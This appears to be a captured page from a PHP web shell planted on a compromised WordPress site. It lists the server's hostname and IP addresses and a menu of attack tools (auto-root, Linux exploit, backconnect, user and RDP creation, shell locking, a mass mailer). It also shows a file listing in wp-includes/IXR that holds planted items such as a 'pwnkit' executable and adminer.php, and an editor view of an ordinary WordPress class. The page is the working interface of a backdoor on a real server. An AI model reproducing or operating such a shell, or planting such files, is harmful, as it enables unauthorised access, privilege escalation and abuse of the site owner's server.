Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.128
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
adrar.info /
wp-includes /
IXR /
[ HOME SHELL ]
Name
Size
Permission
Action
IXR
[ DIR ]
drwx---r-x
.htaccess
91
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
class-IXR-base64.php
414
B
-rw-r--r--
class-IXR-client.php
4.53
KB
-rw-r--r--
class-IXR-clientmulticall.php
963
B
-rw-r--r--
class-IXR-date.php
1.64
KB
-rw-r--r--
class-IXR-error.php
854
B
-rw-r--r--
class-IXR-introspectionserver....
5.2
KB
-rw-r--r--
class-IXR-message.php
7.88
KB
-rw-r--r--
class-IXR-request.php
927
B
-rw-r--r--
class-IXR-server.php
6.77
KB
-rw-r--r--
class-IXR-value.php
3.7
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-IXR-request.php
<?php /** * IXR_Request * * @package IXR * @since 1.5.0 */ class IXR_Request { var $method; var $args; var $xml; /** * PHP5 constructor. */ function __construct($method, $args) { $this->method = $method; $this->args = $args; $this->xml = <<<EOD <?xml version="1.0"?> <methodCall> <methodName>{$this->method}</methodName> <params> EOD; foreach ($this->args as $arg) { $this->xml .= '<param><value>'; $v = new IXR_Value($arg); $this->xml .= $v->getXml(); $this->xml .= "</value></param>\n"; } $this->xml .= '</params></methodCall>'; } /** * PHP4 constructor. */ public function IXR_Request( $method, $args ) { self::__construct( $method, $args ); } function getLength() { return strlen($this->xml); } function getXml() { return $this->xml; } }
Close